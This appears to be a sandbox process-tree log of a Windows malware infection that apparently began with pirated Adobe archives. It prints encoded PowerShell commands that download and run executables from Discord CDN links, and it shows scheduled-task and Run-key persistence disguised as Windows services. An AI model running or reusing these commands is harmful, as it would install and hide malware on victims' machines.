C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZQBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADQANAA5ADQAMAA5ADMAMwAxADUAMAAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAdQBhAGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAG4AagAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBuAHAAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBKAEQAUwBEAFMANAAuAGUAeABlACcAKQApADwAIwB3AHAAeAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAG4AawAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBkAGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcASgBEAFMARABTADQALgBlAHgAZQAnACkAPAAjAGUAYgBoACMAPgA="5⤵
-
C:\Users\Admin\AppData\Roaming\JDSDS4.exe"C:\Users\Admin\AppData\Roaming\JDSDS4.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\sgq83QQfG4.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\sgq83QQfG4.exeC:\Users\Admin\AppData\Local\Temp\sgq83QQfG4.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYwBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADUANAAzADMANgAxADcANAAxADYAMAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGoAdABqACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBrAGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYQBrAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUABPAFMAQQAxADIALgBlAHgAZQAnACkAKQA8ACMAZABoAGgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwByAGIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAbABjACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFAATwBTAEEAMQAyAC4AZQB4AGUAJwApADwAIwB1AG4AcQAjAD4A"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\POSA12.exe"C:\Users\Admin\AppData\Roaming\POSA12.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\RJPrfsm7fj.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\RJPrfsm7fj.exeC:\Users\Admin\AppData\Local\Temp\RJPrfsm7fj.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAaAB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADgAMQA2ADEAMQA3ADMAMwAxADEAMwAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGMAYQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwBzAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB2AGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATQBOAFoAWABIAEEAMwA2AC4AZQB4AGUAJwApACkAPAAjAHUAdQBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAbgBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAG0AcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAE4AWgBYAEgAQQAzADYALgBlAHgAZQAnACkAPAAjAHQAdQBzACMAPgA="5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\MNZXHA36.exe"C:\Users\Admin\AppData\Roaming\MNZXHA36.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1784 -s 7927⤵
- Program crash
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\oVvR0Kg0to.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\oVvR0Kg0to.exeC:\Users\Admin\AppData\Local\Temp\oVvR0Kg0to.exe4⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAdgB2ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADUAOQA5ADcANwA3ADIANQA1ADUAMgA0AC8AVwBpAG4AZABvAHcAcwBEAGUAZgBlAG4AZABlAHIAUwBtAGEAcgB0AHQAUwBjAHIAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAdABxAGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBtAGcAZQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAGoAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ASQBYAEMAQgAzAC4AZQB4AGUAJwApACkAPAAjAHgAcQBnACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHYAbAB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB2AGwAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBQAE8ASQBYAEMAQgAzAC4AZQB4AGUAJwApADwAIwB3AHEAZgAjAD4A"5⤵
-
C:\Users\Admin\AppData\Roaming\POIXCB3.exe"C:\Users\Admin\AppData\Roaming\POIXCB3.exe"6⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\TdAEHN5fwV.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\TdAEHN5fwV.exeC:\Users\Admin\AppData\Local\Temp\TdAEHN5fwV.exe4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAZwBnACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADMAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANQAwADAANQA0ADMANgA5ADIAOAAwAC8AaQBvAGQAaQBwAHAAYwBtAG0AbAAuAGUAeABlACcALAAgADwAIwBjAG0AagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHoAYgBhACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHYAZwBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEIAVgBOAE0AWABDAEcASABKADcALgBlAHgAZQAnACkAKQA8ACMAaQB1AGkAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbAB1AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHIAdwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEIAVgBOAE0AWABDAEcASABKADcALgBlAHgAZQAnACkAPAAjAGcAZAB1ACMAPgA="5⤵
-
C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe"C:\Users\Admin\AppData\Roaming\BVNMXCGHJ7.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\Kh5qEBPvMk.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\Kh5qEBPvMk.exeC:\Users\Admin\AppData\Local\Temp\Kh5qEBPvMk.exe4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAYgByACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANQA5ADIAMQA4ADkAMgA3ADYANgA2AC8AVwBDAHIAbwBuAFMAZQBjAHUAcgBpAHQAeQBfAHAAcgBvAHQAZQBjAHQAZQBkAC4AZQB4AGUAJwAsACAAPAAjAGUAeQBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBtAHUAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBjAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUQBIAEcASgBBAFMARAAyADcALgBlAHgAZQAnACkAKQA8ACMAdwB4AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAegBpAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG4AdgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFEASABHAEoAQQBTAEQAMgA3AC4AZQB4AGUAJwApADwAIwBmAHAAcAAjAD4A"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\QHGJASD27.exe"C:\Users\Admin\AppData\Roaming\QHGJASD27.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \WindowsFilerar /tr "C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f7⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \WindowsFilerar /tr "C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsFilerar';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsFilerar' -Value '"C:\Users\Admin\AppData\Roaming\WindowsFilerar\WindowsFilerar.exe"' -PropertyType 'String'7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\IAWbmRKnNw.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\IAWbmRKnNw.exeC:\Users\Admin\AppData\Local\Temp\IAWbmRKnNw.exe4⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBlACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADcAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYANwA3ADYAOQA0ADgAMwA2ADgAMgA3AC8ARABlAGYAZQBuAGQAZQByAFMAYwByAGUAZQBlAG4ALgBlAHgAZQAnACwAIAA8ACMAZwBqAHgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwB0AGMAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAHIAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAUwBKAEQAUwBBAEsARABRAC4AZQB4AGUAJwApACkAPAAjAGwAZwB3ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGMAcABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBkAGIAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAUwBKAEQAUwBBAEsARABRAC4AZQB4AGUAJwApADwAIwBwAGsAaQAjAD4A"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\LKSJDSAKDQ.exe"C:\Users\Admin\AppData\Roaming\LKSJDSAKDQ.exe"6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 7807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6540 -s 7807⤵
- Program crash
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\zmmP77vsYU.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\zmmP77vsYU.exeC:\Users\Admin\AppData\Local\Temp\zmmP77vsYU.exe4⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAeQBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADEAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADYAOQA2ADMAMAA0ADkANwA1ADkAOQAyAC8AVwBpAG4AZABvAHcAcwBTAGgAZQBlAGwASABvAHMALgBlAHgAZQAnACwAIAA8ACMAawBiAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBkAHAAYgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBwAGYAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAWABNAE4AWAA1ADUALgBlAHgAZQAnACkAKQA8ACMAdwBnAHIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYQByAGMAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGsAYgBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwASwBYAE0ATgBYADUANQAuAGUAeABlACcAKQA8ACMAcwB6AGIAIwA+AA=="5⤵
-
C:\Users\Admin\AppData\Roaming\LKXMNX55.exe"C:\Users\Admin\AppData\Roaming\LKXMNX55.exe"6⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\yoMEITfbTK.exe3⤵
-
C:\Users\Admin\AppData\Local\Temp\yoMEITfbTK.exeC:\Users\Admin\AppData\Local\Temp\yoMEITfbTK.exe4⤵
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAagB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADkAMAA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA0ADkANAAxADAAMgAxADcANAAyADAANQAzADMAOAAyADAALwAxADAANAA5ADQAMQA3ADgAMQAwADUAOAA3ADEANgA0ADcAOAAyAC8AdwBJAE4AUgBBAFIALgBlAHgAZQAnACwAIAA8ACMAbQByAHUAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHMAdQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAGkAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAWABNAE4AQgBaAFgANQA1AC4AZQB4AGUAJwApACkAPAAjAHEAYwB5ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGgAcQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBlAHoAdQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBMAEsAWABNAE4AQgBaAFgANQA1AC4AZQB4AGUAJwApADwAIwBqAGkAZwAjAD4A"5⤵
- Blocklisted process makes network request
-
C:\Users\Admin\AppData\Roaming\LKXMNBZX55.exe"C:\Users\Admin\AppData\Roaming\LKXMNBZX55.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd7⤵
-
C:\Users\Admin\AppData\Local\Temp\35JrmltklD.exe"C:\Users\Admin\AppData\Local\Temp\35JrmltklD.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAaAB0ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAA5ADQAMQAwADIAMQA3ADQAMgAwADUAMwAzADgAMgAwAC8AMQAwADQAOQA0ADEANwA1ADgAMQA2ADEAMQA3ADMAMwAxADEAMwAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGMAYQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwBzAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB2AGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATQBOAFoAWABIAEEAMwA2AC4AZQB4AGUAJwApACkAPAAjAHUAdQBrACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHkAbgBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBrAG0AcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAE4AWgBYAEgAQQAzADYALgBlAHgAZQAnACkAPAAjAHQAdQBzACMAPgA="3⤵
- Blocklisted process makes network request
-
C:\Users\Admin\Downloads\7z2201-x64.exe"C:\Users\Admin\Downloads\7z2201-x64.exe"2⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Adobe_Lightroom\" -spe -an -ai#7zMap56:92:7zEvent306402⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Adobe_Lightroom\" -spe -an -ai#7zMap9025:92:7zEvent97982⤵
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Photoshop2022\" -spe -an -ai#7zMap6809:88:7zEvent169182⤵
-
C:\Program Files (x86)\Gkdv\yx8pgdl0px.exe"C:\Program Files (x86)\Gkdv\yx8pgdl0px.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1372 -s 6203⤵
- Program crash
-
C:\Program Files (x86)\Ssnrt\7no04fld0or5.exe"C:\Program Files (x86)\Ssnrt\7no04fld0or5.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4332 -s 6243⤵
- Program crash
-
C:\Users\Admin\Downloads\tord.exe"C:\Users\Admin\Downloads\tord.exe"2⤵
- Checks computer location settings
- NTFS ADS
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe"C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe"3⤵
- Checks computer location settings
- Adds Run key to start application
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000026001\CRYPTED_BSI20221205.exe"C:\Users\Admin\AppData\Local\Temp\1000026001\CRYPTED_BSI20221205.exe"4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 4125⤵
- Program crash
-
